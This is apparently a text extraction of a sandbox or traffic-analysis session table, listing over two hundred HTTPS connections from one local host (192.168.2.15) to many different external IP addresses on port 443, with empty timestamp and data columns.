                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18292192.168.2.1544130151.136.51.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18293192.168.2.1552700192.225.94.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18294192.168.2.154035283.238.159.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18295192.168.2.1543944136.249.178.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18296192.168.2.154256638.200.240.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18297192.168.2.1535180163.122.57.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18298192.168.2.1540294105.250.16.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18299192.168.2.1536560203.139.192.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18300192.168.2.154912475.244.81.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18301192.168.2.155054623.251.119.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18302192.168.2.1535928160.197.223.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18303192.168.2.1540890124.86.182.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18304192.168.2.1535542134.120.81.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18305192.168.2.1557204177.82.101.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18306192.168.2.1553642213.210.224.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18307192.168.2.1553688219.151.35.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18308192.168.2.1546330120.29.98.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18309192.168.2.1557468171.18.225.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18310192.168.2.154292488.72.49.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18311192.168.2.153630049.78.122.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18312192.168.2.155094284.175.231.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18313192.168.2.153884436.196.237.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18314192.168.2.1538240108.176.164.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18315192.168.2.154511235.28.34.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18316192.168.2.1556576195.244.133.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18317192.168.2.155450617.105.191.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18318192.168.2.154483290.176.142.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18319192.168.2.1556830179.188.122.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18320192.168.2.1551550137.23.9.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18321192.168.2.1554858116.54.13.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18322192.168.2.1545120119.198.232.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18323192.168.2.15568482.216.113.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18324192.168.2.1535616131.58.219.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18325192.168.2.154694687.165.14.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18326192.168.2.1559726132.151.47.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18327192.168.2.1558628178.82.80.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18328192.168.2.1547502180.19.98.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18329192.168.2.1546504143.129.250.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18330192.168.2.1547978200.64.243.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18331192.168.2.1555458148.49.162.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18332192.168.2.1536384109.174.87.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18333192.168.2.1540008207.228.87.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18334192.168.2.154208470.78.197.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18335192.168.2.1548998117.30.108.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18336192.168.2.153531264.195.207.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18337192.168.2.15439481.48.171.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18338192.168.2.1546218132.87.71.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18339192.168.2.155833619.60.146.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18340192.168.2.1558908171.147.130.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18341192.168.2.15382584.134.178.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18342192.168.2.154769418.27.140.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18343192.168.2.155309239.21.216.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18344192.168.2.15533329.199.229.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18345192.168.2.154472666.140.163.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18346192.168.2.1543292190.91.59.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18347192.168.2.1543166119.168.37.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18348192.168.2.156080466.177.244.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18349192.168.2.1542582219.29.111.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18350192.168.2.153638853.187.15.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18351192.168.2.1537688101.178.85.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18352192.168.2.1554344163.249.186.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18353192.168.2.1551938124.46.241.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18354192.168.2.1554526119.143.26.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18355192.168.2.155941247.22.41.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18356192.168.2.1537488152.175.83.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18357192.168.2.1558040216.124.154.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18358192.168.2.1535284116.178.211.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18359192.168.2.154801264.188.183.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18360192.168.2.1539290145.234.201.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18361192.168.2.1542310132.78.65.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18362192.168.2.154903266.83.109.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18363192.168.2.1560084172.37.118.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18364192.168.2.1541354171.141.47.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18365192.168.2.154378077.115.205.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18366192.168.2.1540614192.26.159.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18367192.168.2.1534706206.117.205.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18368192.168.2.155240663.153.155.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18369192.168.2.1551224124.143.200.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18370192.168.2.1549306156.171.16.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18371192.168.2.1551616182.43.209.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18372192.168.2.1551178153.145.5.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18373192.168.2.155612443.12.11.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18374192.168.2.1559556197.182.53.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18375192.168.2.154364073.10.131.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18376192.168.2.1560602193.156.17.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18377192.168.2.1535280216.138.185.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18378192.168.2.1558488152.30.57.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18379192.168.2.1537186167.55.30.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18380192.168.2.1543474211.156.146.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18381192.168.2.1549094132.134.49.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18382192.168.2.1548396193.225.72.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18383192.168.2.1534024154.4.158.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18384192.168.2.154460445.240.243.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18385192.168.2.1549492138.132.201.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18386192.168.2.153442451.115.28.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18387192.168.2.155352046.235.157.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18388192.168.2.1543516209.37.64.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18389192.168.2.1534016168.223.253.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18390192.168.2.154260078.41.156.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18391192.168.2.155984872.145.214.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18392192.168.2.1552960163.29.12.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18393192.168.2.1551562156.137.126.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18394192.168.2.1559482104.247.34.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18395192.168.2.1557950138.108.4.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18396192.168.2.1560728163.172.143.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18397192.168.2.1538498116.132.65.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18398192.168.2.1537320153.111.118.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18399192.168.2.1551794223.167.178.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18400192.168.2.154555063.87.13.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18401192.168.2.155402668.194.42.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18402192.168.2.1544462158.99.122.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18403192.168.2.1546876136.8.109.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18404192.168.2.1548418106.90.93.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18405192.168.2.153703271.1.255.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18406192.168.2.155074271.47.216.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18407192.168.2.1557286110.192.85.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18408192.168.2.1547452125.70.93.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18409192.168.2.155826849.110.81.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18410192.168.2.1546790205.118.34.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18411192.168.2.155312687.39.119.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18412192.168.2.1543452108.45.117.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18413192.168.2.155172485.251.125.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18414192.168.2.155212227.152.154.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18415192.168.2.1560236194.186.28.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18416192.168.2.1558450161.55.36.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18417192.168.2.1545590207.138.99.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18418192.168.2.1541010154.204.138.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18419192.168.2.1536128207.176.97.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18420192.168.2.1558670220.156.111.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18421192.168.2.156059270.153.153.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18422192.168.2.1536570101.167.75.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18423192.168.2.154539077.63.231.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18424192.168.2.155356879.72.122.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18425192.168.2.156088486.160.114.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18426192.168.2.1557040189.176.120.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18427192.168.2.1539396100.136.90.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18428192.168.2.155128868.64.248.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18429192.168.2.155563882.1.245.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18430192.168.2.1552686222.198.85.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18431192.168.2.1535640199.34.87.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18432192.168.2.155245891.186.223.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18433192.168.2.153804471.166.196.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18434192.168.2.154024661.93.29.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18435192.168.2.1548330174.68.50.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18436192.168.2.1554628138.197.227.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18437192.168.2.154327848.124.107.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18438192.168.2.1545326154.99.142.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18439192.168.2.1555262132.140.252.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18440192.168.2.155499619.2.249.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18441192.168.2.1553182106.198.235.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18442192.168.2.1559708213.238.60.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18443192.168.2.154212057.36.181.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18444192.168.2.1544938190.172.61.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18445192.168.2.1551060206.50.121.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18446192.168.2.1535324179.56.189.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18447192.168.2.1544746129.201.183.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18448192.168.2.1552008211.166.3.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18449192.168.2.1550394144.154.154.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18450192.168.2.1549846134.208.250.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18451192.168.2.1545454166.217.25.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18452192.168.2.1542218124.188.115.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18453192.168.2.1537534159.58.68.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18454192.168.2.156063044.233.71.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18455192.168.2.1542440136.184.226.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18456192.168.2.153439083.239.191.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18457192.168.2.154150027.183.184.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18458192.168.2.1558032160.219.253.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18459192.168.2.155574451.15.181.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18460192.168.2.1547396116.92.181.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18461192.168.2.155932240.141.253.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18462192.168.2.1536582221.254.168.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18463192.168.2.1554470216.60.104.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18464192.168.2.1535172106.220.31.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18465192.168.2.1558304149.5.199.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18466192.168.2.1543932115.33.86.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18467192.168.2.155017278.98.72.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18468192.168.2.1533060152.189.131.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18469192.168.2.15458408.141.36.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18470192.168.2.1536798218.39.117.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18471192.168.2.1557468157.21.21.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18472192.168.2.1535146126.7.98.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18473192.168.2.1559828186.46.219.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18474192.168.2.1553554137.197.37.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18475192.168.2.1542256218.110.180.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18476192.168.2.1542080222.193.195.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18477192.168.2.1534084161.116.49.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18478192.168.2.1558658176.153.156.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18479192.168.2.153668264.224.251.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18480192.168.2.1538210220.148.91.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18481192.168.2.1554544101.228.216.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18482192.168.2.1548408150.18.91.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18483192.168.2.154421457.181.166.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18484192.168.2.154805023.148.197.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18485192.168.2.1545104201.255.177.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18486192.168.2.1539740103.217.77.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18487192.168.2.1552904147.115.134.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18488192.168.2.1552846191.55.240.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18489192.168.2.155373252.198.204.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18490192.168.2.1537730216.108.199.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18491192.168.2.156011272.101.210.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18492192.168.2.153360698.0.34.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18493192.168.2.1541790197.63.85.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18494192.168.2.155713863.18.86.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18495192.168.2.155056065.203.117.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18496192.168.2.153739054.1.240.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18497192.168.2.156002836.79.139.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18498192.168.2.1541774182.129.194.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18499192.168.2.1545338108.223.112.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18500192.168.2.1549286105.31.91.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18501192.168.2.154556054.212.50.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18502192.168.2.153632620.184.62.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18503192.168.2.153957061.63.229.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18504192.168.2.1551694110.73.29.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18505192.168.2.155428232.31.119.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18506192.168.2.1550640160.1.234.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18507192.168.2.153520499.130.49.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18508192.168.2.1559338132.178.71.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18509192.168.2.1540438149.196.127.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18510192.168.2.15411365.60.87.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18511192.168.2.1537858167.198.17.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18512192.168.2.1538834105.75.211.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18513192.168.2.154252073.47.36.198443
